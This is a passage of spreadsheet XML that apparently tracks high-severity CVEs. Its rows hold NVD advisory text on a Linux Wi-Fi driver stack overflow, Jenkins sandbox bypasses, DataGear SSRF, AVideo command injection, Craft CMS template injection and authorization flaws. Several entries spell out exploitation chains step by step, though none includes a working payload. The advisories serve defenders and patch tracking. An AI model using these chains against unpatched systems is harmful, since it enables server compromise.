          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90000</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90018</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="inlineStr"/>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr"/>
      <c r="K233" s="5" t="inlineStr"/>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr"/>
      <c r="Q233" s="5" t="inlineStr"/>
      <c r="R233" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
staging: rtl8723bs: fix OOB read / stack overflow in rtw_get_wps_attr()
rtw_get_wps_attr() walks WPS attributes inside a WPS IE taken from
a wireless management frame. For each candidate attribute it only
checks that the fixed 4-byte attribute header (2-byte ID + 2-byte
length) fits inside the IE:
	if (attr_ptr + 4 &gt; wps_ie + wps_ielen)
		break;
	u16 attr_id = get_unaligned_be16(attr_ptr);
	u16 attr_data_len = get_unaligned_be16(attr_ptr + 2);
	u16 attr_len = attr_data_len + 4;
attr_data_len (and therefore attr_len) is read directly from the
wire and is never checked against the remaining bytes in the IE
before being used as the size of:
	memcpy(buf_attr, attr_ptr, attr_len);
Since attr_len is fully attacker controlled (0 to 65535+4), this is
both a heap OOB read of wps_ie, and, more seriously, a stack buffer
overflow at several call sites where buf_attr is a single-byte
stack variable, e.g. rtw_get_wps_attr_content()'s callers passing
WPS_ATTR_SELECTED_REGISTRAR into a stack "u8 sr"/"u8
selected_registrar" (drivers/staging/rtl8723bs/os_dep/ioctl_cfg80211.c,
drivers/staging/rtl8723bs/core/rtw_mlme_ext.c). A crafted WPS IE in a
beacon or probe response processed during scanning can therefore
smash the stack of the parsing thread.
rtw_get_wps_attr_content() itself has no independent length check
and simply trusts the attr_len it gets back from rtw_get_wps_attr(),
so fixing the bound here also fixes that caller.
The "attr_ptr + 4 &gt; wps_ie + wps_ielen" header check above was added
by commit 1463ca3ec6601 ("staging: rtl8723bs: fix OOB reads in
rtw_get_sec_ie(), rtw_get_wapi_ie(), and rtw_get_wps_attr()"), which
bounded the fixed header but never extended the check to cover the
variable-length attribute data that follows it. Add that missing
check before attr_len is used as a memcpy() length or accepted as a
match.</t>
        </is>
      </c>
      <c r="S233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90018</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90041</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="inlineStr"/>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr"/>
      <c r="K234" s="5" t="inlineStr"/>
      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr"/>
      <c r="Q234" s="5" t="inlineStr"/>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: sony: clean up device list on probe failure
sony_input_configured() adds some controllers to sony_device_list before
HID core registers their input devices. input_register_device() can fail
after the callback returns successfully. sony_probe() then observes that
HID_CLAIMED_INPUT is clear and unwinds, but only stops the HID hardware.
The devres-managed sony_sc is freed while its list node remains linked, so
the next matching controller traverses freed memory.
Initialize the list node and device ID to inactive states. Make list
removal idempotent and run the driver-private cleanup on every probe
failure path. This also makes a second cleanup safe when
sony_input_configured() already unwound a partial initialization before
sony_probe() handles the missing input claim.
Found by 0sec (https://0sec.ai) using automated source analysis;
verified against the HID input registration and probe unwind paths.</t>
        </is>
      </c>
      <c r="S234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90041</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92122</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="inlineStr"/>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K235" s="5" t="inlineStr"/>
      <c r="L235" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr"/>
      <c r="Q235" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>Jenkins Script Security Plugin 1415.v9a_f9b_3a_c253d and earlier does not check the method called through the proxy created when a sandboxed script coerces a value to an interface, if the value inherits a method of the same name as an interface method, allowing attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.</t>
        </is>
      </c>
      <c r="S235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92122</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92123</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="inlineStr"/>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K236" s="5" t="inlineStr"/>
      <c r="L236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr"/>
      <c r="Q236" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R236" s="5" t="inlineStr">
        <is>
          <t>Jenkins Script Security Plugin 1415.v9a_f9b_3a_c253d and earlier does not intercept operations performed on a null receiver (method calls, property and attribute accesses, and array accesses), allowing attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.</t>
        </is>
      </c>
      <c r="S236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92123</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92124</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="inlineStr"/>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K237" s="5" t="inlineStr"/>
      <c r="L237" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr"/>
      <c r="Q237" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>Jenkins Script Security Plugin 1415.v9a_f9b_3a_c253d and earlier checks the operations Groovy will perform with the elements it reads from a collection that a sandboxed script casts to another type but performs the cast on the collection itself, allowing attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.</t>
        </is>
      </c>
      <c r="S237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92124</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92125</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="inlineStr"/>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K238" s="5" t="inlineStr"/>
      <c r="L238" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr"/>
      <c r="Q238" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>Jenkins Script Security Plugin 1415.v9a_f9b_3a_c253d and earlier does not reject the @GroovyASTTransformationClass annotation, allowing attackers with permission to define and run sandboxed scripts, including Pipelines, to run an arbitrary AST transformation at compile time, bypassing the sandbox protection and executing arbitrary code in the context of the Jenkins controller JVM.</t>
        </is>
      </c>
      <c r="S238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92125</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92137</t>
        </is>
      </c>
      <c r="D239" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F239" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="inlineStr"/>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K239" s="5" t="inlineStr"/>
      <c r="L239" s="5" t="inlineStr"/>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr"/>
      <c r="Q239" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R239" s="5" t="inlineStr">
        <is>
          <t>Jenkins Robot Framework Plugin 6.2.2 and earlier does not check that the archive directory configured for Robot Framework report files is contained within the build directory on the Jenkins controller, allowing attackers with Item/Configure permission to create or replace arbitrary files on the Jenkins controller file system with attacker-specified content, which can lead to remote code execution.</t>
        </is>
      </c>
      <c r="S239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92137</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92466</t>
        </is>
      </c>
      <c r="D240" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="inlineStr"/>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr">
        <is>
          <t>elastic</t>
        </is>
      </c>
      <c r="K240" s="5" t="inlineStr"/>
      <c r="L240" s="5" t="inlineStr"/>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr"/>
      <c r="Q240" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R240" s="5" t="inlineStr">
        <is>
          <t>zlt2000 microservices-platform through 6.0.0 contains a missing authorization vulnerability where the zlt.security.auth.urlPermission.enable flag defaults to false, disabling all permission checks after authentication. Authenticated users with no roles can access administrative APIs including user management, role assignment, and Elasticsearch index operations by bypassing the disabled authorization enforcement.</t>
        </is>
      </c>
      <c r="S240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92466</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92566</t>
        </is>
      </c>
      <c r="D241" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F241" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="inlineStr"/>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr"/>
      <c r="K241" s="5" t="inlineStr"/>
      <c r="L241" s="5" t="inlineStr"/>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr"/>
      <c r="Q241" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R241" s="5" t="inlineStr">
        <is>
          <t>DataGear through 6.0.0 contains a server-side request forgery vulnerability in the /dataSet/preview/Http endpoint that allows unauthenticated attackers to execute arbitrary HTTP requests by supplying a caller-controlled URI. Attackers can issue GET, POST, PUT, PATCH, or DELETE requests to internal endpoints and cloud metadata services, receiving full response bodies without authentication or validation.</t>
        </is>
      </c>
      <c r="S241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92566</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92580</t>
        </is>
      </c>
      <c r="D242" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="inlineStr"/>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr"/>
      <c r="K242" s="5" t="inlineStr"/>
      <c r="L242" s="5" t="inlineStr"/>
      <c r="M242" s="5" t="inlineStr"/>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr"/>
      <c r="Q242" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R242" s="5" t="inlineStr">
        <is>
          <t>In AVideo through 29.0, the CloneSite plugin is vulnerable to stored OS command injection. In plugin/CloneSite/cloneClient.json.php (line ~270) the stored SSH password is substituted into the command string `sshpass -p '{password}' rsync ...` with a plain str_replace and no escaping, so a single quote in the password breaks out of the quoted word and injects arbitrary shell. The password is written through the admin-only endpoint objects/pluginAddDataObject.json.php, whose only CSRF defense (isUntrustedRequest()/forbidIfIsUntrustedRequest()) is a no-op when the request source appears to be loopback — as happens behind a same-host TLS-terminating reverse proxy with $global['trustedProxies'] unset — or when an attacker-controlled application is co-hosted on the same hostname; on HTTPS the session cookie is issued with SameSite=None, so a cross-site POST carries it. An unauthenticated remote attacker can therefore lure an authenticated administrator into planting a malicious password (and an attacker-controlled cloneSiteURL), after which the plugin's documented crontab entry executes the injected command with no further administrator action, as the crontab owner (commonly root or www-data). Exploitation requires the CloneSite plugin to be enabled with the documented crontab installed and one of the above CSRF channels; default single-process Apache deployments are reported as not CSRF-exploitable. This is a residual sink of CVE-2026-41304. The issue is confirmed at master HEAD (8963b6a1); no patched version is available.</t>
        </is>
      </c>
      <c r="S242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92580</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92592</t>
        </is>
      </c>
      <c r="D243" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E243" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="inlineStr"/>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr"/>
      <c r="K243" s="5" t="inlineStr"/>
      <c r="L243" s="5" t="inlineStr"/>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr"/>
      <c r="Q243" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="R243" s="5" t="inlineStr">
        <is>
          <t>Craft CMS 4.8.0 through 4.18.5 and 5.0.0 through 5.10.12 sign an authenticated user's attacker-controlled license-shun cookie with the same key and format used to validate signed redirect parameters, because the HMAC signature is not bound to its purpose (Yii's cookieValidationKey is derived from the same Craft securityKey used for signed request parameters). An authenticated, non-administrator user (Control Panel access is not required) can set the cookie via the license-shun endpoint and transplant the signed envelope into the redirect parameter; on a successful login, Craft validates the signature and renders the authenticated bytes as an unsandboxed Twig template, where Twig's map filter accepts a string callback and allows PHP system() to execute arbitrary operating-system commands as the web-server user. Exploitation requires an account using password authentication without active 2FA, the default request configuration, and availability of PHP system(). The issue is fixed in 4.18.6 and 5.10.13.</t>
        </is>
      </c>
      <c r="S243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92592</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92593</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="inlineStr"/>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr"/>
      <c r="K244" s="5" t="inlineStr"/>
      <c r="L244" s="5" t="inlineStr"/>
      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr"/>
      <c r="Q244" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>Craft CMS versions 5.10.0 through 5.10.12 contain an incomplete fix for CVE-2026-55794: the Controller::getPostedRedirectUrl() -&gt; View::renderObjectTemplate() sink remained unsandboxed, and the same fix commit added a self-signing oracle in Cp::elementLabelHtml(). Because Craft/Yii HMAC tokens are not bound to a parameter name, an authenticated low-privilege control panel user with edit rights on a single element type can mint a token over attacker-controlled Twig for the returnUrl parameter and replay it as the redirect POST parameter, reaching the unsandboxed sink and achieving server-side template injection that executes arbitrary PHP code (full server compromise). The issue is fixed in 5.10.13.</t>
        </is>
      </c>
      <c r="S244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92593</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92748</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="inlineStr"/>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr"/>
      <c r="K245" s="5" t="inlineStr"/>
      <c r="L245" s="5" t="inlineStr"/>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr"/>
      <c r="Q245" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>BC Security Empire before 6.7.1 fails to validate the multipart filename parameter in upload endpoints, allowing authenticated operators to write files to arbitrary paths on the C2 server. Attackers can use path traversal sequences in the filename to bypass directory containment and write malicious files to sensitive locations for code execution.</t>
        </is>
      </c>
      <c r="S245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92748</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92761</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="inlineStr"/>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr"/>
      <c r="K246" s="5" t="inlineStr"/>
      <c r="L246" s="5" t="inlineStr"/>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr"/>
      <c r="Q246" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>WebVirtCloud fails to properly validate permission flags in UserInstance grants, allowing view-only users to perform privileged actions. Attackers with read-only grants can power off virtual machines, reset root passwords, install SSH keys, and manage ISO images by exploiting the get_instance gate that only checks grant existence.</t>
        </is>
      </c>
      <c r="S246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92761</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92762</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="inlineStr"/>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K247" s="5" t="inlineStr"/>
      <c r="L247" s="5" t="inlineStr"/>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr"/>
      <c r="Q247" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>Pelican Panel versions before 1.0.0-beta35 enforce startup write permissions only through disabled form controls rather than server-side authorization checks. Attackers with startup.read permission can craft Livewire state updates to invoke afterStateUpdated callbacks and modify startup commands, docker images, and variables to execute arbitrary commands in the container.</t>
        </is>
      </c>
      <c r="S247" s="6" t="inlineStr">
